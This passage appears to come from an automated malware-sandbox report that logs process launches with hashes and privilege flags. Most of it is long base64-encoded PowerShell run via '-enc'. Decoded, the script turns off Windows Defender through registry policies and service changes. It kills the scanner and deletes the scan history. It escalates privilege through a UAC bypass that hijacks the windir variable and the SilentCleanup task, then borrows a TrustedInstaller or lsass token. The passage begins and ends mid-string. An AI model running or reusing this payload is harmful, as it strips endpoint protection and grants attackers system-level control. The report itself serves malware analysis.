BsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
Imagebase:	0x4a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:11:25
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:11:26
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGU